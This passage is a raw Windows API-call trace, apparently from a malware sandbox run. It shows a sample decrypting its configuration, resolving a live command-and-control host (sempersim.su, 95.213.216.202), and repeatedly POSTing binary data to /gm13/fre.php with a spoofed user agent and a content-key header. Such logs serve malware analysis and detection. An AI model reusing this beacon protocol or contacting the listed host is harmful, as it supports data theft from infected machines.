(lpLibFileName="ADVAPI32") returned 0x77420000 [0219.250] CryptImportKey (in: hProv=0x63bcb0, pbData=0x638fa8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0219.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0219.251] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0219.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0219.252] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0219.252] GetProcessHeap () returned 0x620000 [0219.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fa8 | out: hHeap=0x620000) returned 1 [0219.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0219.254] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642ea0, pdwDataLen=0x19fcfc | out: pbData=0x642ea0, pdwDataLen=0x19fcfc) returned 1 [0219.254] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0219.255] CryptDestroyKey (hKey=0x62d710) returned 1 [0219.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0219.256] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0219.256] GetProcessHeap () returned 0x620000 [0219.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645ca8 [0219.256] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0219.257] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0219.257] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0219.258] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0219.258] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0219.259] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0219.259] GetProcessHeap () returned 0x620000 [0219.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633318 [0219.259] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c5f0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebc8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0219.261] GetProcessHeap () returned 0x620000 [0219.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b5a0 [0219.261] socket (af=2, type=1, protocol=6) returned 0x390 [0219.261] connect (s=0x390, name=0x63ebc8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0219.417] FreeAddrInfoW (pAddrInfo=0x63c5f0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebc8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0219.417] GetProcessHeap () returned 0x620000 [0219.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0219.417] GetProcessHeap () returned 0x620000 [0219.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0219.418] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0219.420] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0219.420] GetProcessHeap () returned 0x620000 [0219.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0219.420] GetProcessHeap () returned 0x620000 [0219.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0219.421] GetProcessHeap () returned 0x620000 [0219.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643560 [0219.421] GetProcessHeap () returned 0x620000 [0219.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0219.422] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0219.423] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0219.423] GetProcessHeap () returned 0x620000 [0219.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0219.423] GetProcessHeap () returned 0x620000 [0219.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0219.423] send (s=0x390, buf=0x63a880*, len=237, flags=0) returned 237 [0219.425] send (s=0x390, buf=0x6421e0*, len=159, flags=0) returned 159 [0219.425] GetProcessHeap () returned 0x620000 [0219.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0219.425] recv (in: s=0x390, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0221.147] GetProcessHeap () returned 0x620000 [0221.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0221.147] GetProcessHeap () returned 0x620000 [0221.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643560 | out: hHeap=0x620000) returned 1 [0221.148] GetProcessHeap () returned 0x620000 [0221.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0221.148] GetProcessHeap () returned 0x620000 [0221.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0221.148] closesocket (s=0x390) returned 0 [0221.149] GetProcessHeap () returned 0x620000 [0221.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b5a0 | out: hHeap=0x620000) returned 1 [0221.149] GetProcessHeap () returned 0x620000 [0221.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645ca8 | out: hHeap=0x620000) returned 1 [0221.149] GetProcessHeap () returned 0x620000 [0221.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642ea0 | out: hHeap=0x620000) returned 1 [0221.150] GetProcessHeap () returned 0x620000 [0221.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633318 | out: hHeap=0x620000) returned 1 [0221.150] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xb90) returned 0x390 [0221.152] Sleep (dwMilliseconds=0xea60) [0221.169] GetProcessHeap () returned 0x620000 [0221.169] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642dc8 [0221.170] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0221.170] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0221.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0221.176] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0221.182] GetProcessHeap () returned 0x620000 [0221.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0221.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0221.193] CryptImportKey (in: hProv=0x63ba08, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0221.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0221.194] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0221.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0221.195] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0221.195] GetProcessHeap () returned 0x620000 [0221.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0221.229] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0221.230] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642dc8, pdwDataLen=0x19fcfc | out: pbData=0x642dc8, pdwDataLen=0x19fcfc) returned 1 [0221.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0221.294] CryptDestroyKey (hKey=0x62d190) returned 1 [0221.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0221.295] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0221.295] GetProcessHeap () returned 0x620000 [0221.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x646548 [0221.296] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0221.296] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0221.297] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0221.297] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0221.298] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0221.298] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0221.299] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0221.299] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0221.299] GetProcessHeap () returned 0x620000 [0221.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x6332a0 [0221.299] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0221.300] GetProcessHeap () returned 0x620000 [0221.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6332a0 | out: hHeap=0x620000) returned 1 [0221.300] GetProcessHeap () returned 0x620000 [0221.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646548 | out: hHeap=0x620000) returned 1 [0221.301] GetProcessHeap () returned 0x620000 [0221.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642dc8 | out: hHeap=0x620000) returned 1 [0221.301] GetProcessHeap () returned 0x620000 [0221.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643368 [0221.302] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0221.302] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0221.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0221.312] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0221.319] GetProcessHeap () returned 0x620000 [0221.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0221.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0221.320] CryptImportKey (in: hProv=0x63ba08, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0221.321] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0221.321] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0221.321] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0221.322] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0221.322] GetProcessHeap () returned 0x620000 [0221.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0221.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0221.326] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643368, pdwDataLen=0x19fcfc | out: pbData=0x643368, pdwDataLen=0x19fcfc) returned 1 [0221.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0221.327] CryptDestroyKey (hKey=0x62d710) returned 1 [0221.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0221.327] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0221.327] GetProcessHeap () returned 0x620000 [0221.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645630 [0221.328] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0221.328] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0221.329] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0221.329] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0221.329] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0221.330] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0221.330] GetProcessHeap () returned 0x620000 [0221.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0221.330] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c208*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0221.331] GetProcessHeap () returned 0x620000 [0221.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b5a0 [0221.331] socket (af=2, type=1, protocol=6) returned 0x394 [0221.331] connect (s=0x394, name=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0221.679] FreeAddrInfoW (pAddrInfo=0x63c208*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0221.680] GetProcessHeap () returned 0x620000 [0221.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba08 [0221.680] GetProcessHeap () returned 0x620000 [0221.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0221.680] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0221.681] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0221.681] GetProcessHeap () returned 0x620000 [0221.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0221.681] GetProcessHeap () returned 0x620000 [0221.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0221.683] GetProcessHeap () returned 0x620000 [0221.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x6430e0 [0221.683] GetProcessHeap () returned 0x620000 [0221.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0221.683] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0221.684] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0221.684] GetProcessHeap () returned 0x620000 [0221.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0221.684] GetProcessHeap () returned 0x620000 [0221.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0221.684] send (s=0x394, buf=0x63a880*, len=237, flags=0) returned 237 [0221.685] send (s=0x394, buf=0x6421e0*, len=159, flags=0) returned 159 [0221.685] GetProcessHeap () returned 0x620000 [0221.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0221.685] recv (in: s=0x394, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0223.467] GetProcessHeap () returned 0x620000 [0223.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0223.468] GetProcessHeap () returned 0x620000 [0223.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6430e0 | out: hHeap=0x620000) returned 1 [0223.468] GetProcessHeap () returned 0x620000 [0223.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0223.468] GetProcessHeap () returned 0x620000 [0223.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba08 | out: hHeap=0x620000) returned 1 [0223.469] closesocket (s=0x394) returned 0 [0223.470] GetProcessHeap () returned 0x620000 [0223.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b5a0 | out: hHeap=0x620000) returned 1 [0223.470] GetProcessHeap () returned 0x620000 [0223.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645630 | out: hHeap=0x620000) returned 1 [0223.470] GetProcessHeap () returned 0x620000 [0223.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643368 | out: hHeap=0x620000) returned 1 [0223.471] GetProcessHeap () returned 0x620000 [0223.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0223.471] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x988) returned 0x394 [0223.474] Sleep (dwMilliseconds=0xea60) [0223.479] GetProcessHeap () returned 0x620000 [0223.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6434d0 [0223.480] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0223.480] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0223.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0223.490] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0223.499] GetProcessHeap () returned 0x620000 [0223.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fa8 [0223.499] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0223.500] CryptImportKey (in: hProv=0x63ba08, pbData=0x638fa8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0223.500] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0223.501] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0223.501] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0223.501] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0223.501] GetProcessHeap () returned 0x620000 [0223.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fa8 | out: hHeap=0x620000) returned 1 [0223.502] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0223.503] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6434d0, pdwDataLen=0x19fcfc | out: pbData=0x6434d0, pdwDataLen=0x19fcfc) returned 1 [0223.503] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0223.504] CryptDestroyKey (hKey=0x62d710) returned 1 [0223.505] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0223.505] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0223.505] GetProcessHeap () returned 0x620000 [0223.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645858 [0223.506] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0223.506] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0223.507] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0223.507] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0223.508] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0223.508] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0223.509] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0223.509] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0223.509] GetProcessHeap () returned 0x620000 [0223.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633340 [0223.509] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0223.510] GetProcessHeap () returned 0x620000 [0223.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633340 | out: hHeap=0x620000) returned 1 [0223.518] GetProcessHeap () returned 0x620000 [0223.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645858 | out: hHeap=0x620000) returned 1 [0223.518] GetProcessHeap () returned 0x620000 [0223.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6434d0 | out: hHeap=0x620000) returned 1 [0223.519] GetProcessHeap () returned 0x620000 [0223.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642ee8 [0223.519] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0223.520] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0223.525] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0223.526] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0223.533] GetProcessHeap () returned 0x620000 [0223.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0223.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0223.534] CryptImportKey (in: hProv=0x63b7e8, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0223.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0223.535] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0223.535] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0223.535] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0223.535] GetProcessHeap () returned 0x620000 [0223.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0223.537] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0223.537] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642ee8, pdwDataLen=0x19fcfc | out: pbData=0x642ee8, pdwDataLen=0x19fcfc) returned 1 [0223.537] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0223.538] CryptDestroyKey (hKey=0x62d710) returned 1 [0223.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0223.538] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0223.538] GetProcessHeap () returned 0x620000 [0223.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645ca8 [0223.539] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0223.539] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0223.540] LoadLibraryW 